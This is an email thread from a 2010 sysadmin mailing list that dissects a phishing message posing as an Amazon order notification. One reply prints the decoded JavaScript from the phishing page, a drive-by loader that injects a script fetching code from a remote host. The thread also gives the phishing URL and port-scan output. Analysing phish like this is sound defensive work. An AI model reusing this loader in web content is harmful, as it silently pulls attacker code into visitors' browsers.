Laugh I just took my CISSP on Saturday….
And I didn’t want to get into what was inside that HTML, that I am not a subject matter expert on.. But honestly, looking at someones malformed code and drive by attacks on a webpage… its not really something I would like to be doing today. But playing with Snadboxie is fun.. Z From: Brian Richards [mailto:[email protected]] Sent: Tuesday, February 23, 2010 2:11 PM To: NT System Admin Issues Subject: Re: Order Notify #401186 +1 on the congrats! @ James - did LI say 'taken' the exam, or 'passed'?? ;-) (runs to check LI status page) Brian ________________________________ From: Jon Harris <[email protected]> To: NT System Admin Issues <[email protected]> Sent: Tue, February 23, 2010 12:25:48 PM Subject: Re: Order Notify #401186 Congrats EZ! Jon On Tue, Feb 23, 2010 at 12:19 PM, James Rankin <[email protected]> wrote: I was just alluding to the fact that my LinkedIn updates told me this morning that EZ had just done the CISSP exam. I am sure a lot of people on this list, CISSPs or not, can identify the intentions and tactics of the spammers and phishers from their attacks :-) On 23 February 2010 17:17, Clark, Tommy R <[email protected]> wrote: If he were fresh from a CISSP exam, he would have decoded the payload in walford.html as the following JavaScript. function ljs(){try{var s=document.createElement("script");s.setAttribute("src","http://saeghiebeesiogoh.in:3129/js";);document.body.appendChild(s)}catch(e){}}setTimeout("ljs()",500); Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js to see what the true intentions were. From: [email protected] [mailto:[email protected]] On Behalf Of James Rankin Sent: Tuesday, February 23, 2010 11:45 AM To: NT System Admin Issues Subject: Re: Order Notify #401186 Now there's a guy who's obviously just fresh from a CISSP exam :-) On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote: http://80.109.240.71/~e.loesberg/walford.html Is the link inside the email. It’s defintely a phishing attack. Single box system behind a firewall (2 hops from source) Name: members.chello.nl <http://members.chello.nl/> Address: 80.109.240.71 (its in Vienna Austria) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ProFTPD 1.2.10 80/tcp open http syn-ack Apache httpd Like they say, never click the link. And don’t answer the email, it lets them know you are there.. and they will just keep spamming you… Z From: Sherry Abercrombie [mailto:[email protected]] Sent: Tuesday, February 23, 2010 10:37 AM To: NT System Admin Issues Subject: Re: Order Notify #401186 GMail is good. Marked this one as spam and sent to my spam folder, with a nice little warning that it might not be from who it says and to be careful, etc etc. On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]> wrote: Oooohhh....I must click on the link, seeing as though it has some funky numbers instead of letters. Looks decidedly unsuspicious On 23 February 2010 15:29, Carol Fee <[email protected]> wrote: What the hec k ?????? CFee From: Customer Support [mailto:[email protected]] Sent: Monday, February 22, 2010 6:55 PM To: NT System Admin Issues Subject: Order Notify #401186 Your Order id:822324764225 Info <http://80.109.240.71/~e.loesberg/walford.html> Thank you. Amazon.com <http://amazon.com/> Support -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." -- Sherry Abercrombie "Any sufficiently advanced technology is indistinguishable from magic." Arthur C. Clarke -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
